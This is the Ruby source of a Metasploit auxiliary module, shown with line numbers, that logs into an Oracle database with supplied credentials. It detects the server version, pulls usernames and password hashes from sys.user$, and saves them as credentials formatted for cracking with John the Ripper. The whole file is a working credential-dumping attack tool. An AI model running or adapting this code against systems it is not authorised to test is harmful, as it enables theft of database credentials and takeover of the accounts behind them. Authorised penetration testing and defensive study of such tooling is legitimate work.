Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::ORACLE
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::Scanner
10

11
  def initialize
12
    super(
13
      'Name'           => 'Oracle Password Hashdump',
14
      'Description'    => %Q{
15
          This module dumps the usernames and password hashes
16
          from Oracle given the proper Credentials and SID.
17
          These are then stored as creds for later cracking using auxiliary/analyze/jtr_oracle_fast.
18
          This module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.
19
      },
20
      'Author'         => ['theLightCosine'],
21
      'License'        => MSF_LICENSE
22
    )
23
  end
24

25
  def run_host(ip)
26
    return if not check_dependencies
27

28
    # Checks for Version of Oracle. Behavior varies with oracle version.
29
    # 12c uses SHA-512 (explained in more detail in report_hashes() below)
30
    # 11g uses SHA-1 while 8i-10g use DES
31
    query =  'select * from v$version'
32
    ver = prepare_exec(query)
33

34
    if ver.nil?
35
      print_error("An error has occurred while querying for the Oracle version. Please check your OPTIONS")
36
      return
37
    end
38

39
    unless ver.empty?
40
      case
41
      when ver[0].include?('8i')
42
        ver='8i'
43
      when ver[0].include?('9i')
44
        ver='9i'
45
      when ver[0].include?('10g')
46
        ver='10g'
47
      when ver[0].include?('11g')
48
        ver='11g'
49
      when ver[0].include?('12c')
50
        ver='12c'
51
      when ver[0].include?('18c')
52
        print_error("Version 18c is not currently supported")
53
        return
54
      else
55
        print_error("Error: Oracle DB version not supported.\nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\nDumping unsupported version info:\n#{ver[0]}")
56
        return
57
      end
58
      vprint_status("Server is running version #{ver}")
59
    end
60

61
    this_service = report_service(
62
          :host  => datastore['RHOST'],
63
          :port => datastore['RPORT'],
64
          :name => 'oracle',
65
          :proto => 'tcp'
66
          )
67

68
    tbl = Rex::Text::Table.new(
69
      'Header'  => 'Oracle Server Hashes',
70
      'Indent'   => 1,
71
      'Columns' => ['Username', 'Hash']
72
    )
73

74
    begin
75
      case ver
76
      when '8i', '9i', '10g'    # Get the usernames and hashes for 8i-10g
77
        query='SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
78
        results= prepare_exec(query)
79
        unless results.empty?
80
          results.each do |result|
81
            row= result.split(/,/)
82
            tbl << row
83
          end
84
        end
85
      when '11g', '12c'    # Get the usernames and hashes for 11g or 12c
86
        query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
87
        results= prepare_exec(query)
88
        #print_status("Results: #{results.inspect}")
89
        unless results.empty?
90
          results.each do |result|
91
            row= result.split(/,/)
92
            next unless row.length == 2
93
            tbl << row
94
          end
95
        end
96
      end
97
    rescue => e
98
      print_error("An error occurred. The supplied credentials may not have proper privileges")
99
      return
100
    end
101
    print_status("Hash table :\n #{tbl}")
102
    report_hashes(tbl, ver, ip, this_service)
103
  end
104

105
  # Save each row in the hash table as credentials (shown by "creds" command)
106
  # This is done slightly differently, depending on the version
107
  def report_hashes(table, ver, ip, service)
108

109
    # Before module jtr_oracle_fast cracks these hashes, they are converted (based on jtr_format)
110
    # to a format that John The Ripper can handle. This format is stored here.
111
    case ver
112
    when '8i', '10g'
113
      jtr_format = "des,oracle"
114
    when '11g'
115
      jtr_format = "raw-sha1,oracle11"
116
    when '12c'
117
      jtr_format = "oracle12c"
118
    end
119

120
    service_data = {
121
      address: Rex::Socket.getaddress(ip),
122
      port: service[:port],
123
      protocol: service[:proto],
124
      service_name: service[:name],
125
      workspace_id: myworkspace_id
126
    }
127

128
    # For each row in the hash table, save its corresponding credential data and JTR format
129
    table.rows.each do |row|
130
      credential_data = {
131
        origin_type: :service,
132
        module_fullname: self.fullname,
133
        username: row[0],
134
        private_data: row[1],
135
        private_type: :nonreplayable_hash,
136
        jtr_format: jtr_format
137
      }
138

139
      credential_core = create_credential(credential_data.merge(service_data))
140

141
      login_data = {
142
        core: credential_core,
143
        status: Metasploit::Model::Login::Status::UNTRIED
144
      }
145

146
      create_credential_login(login_data.merge(service_data))
147
    end
148
    print_good("Hash Table has been saved")
149
  end
150

151
end
152

153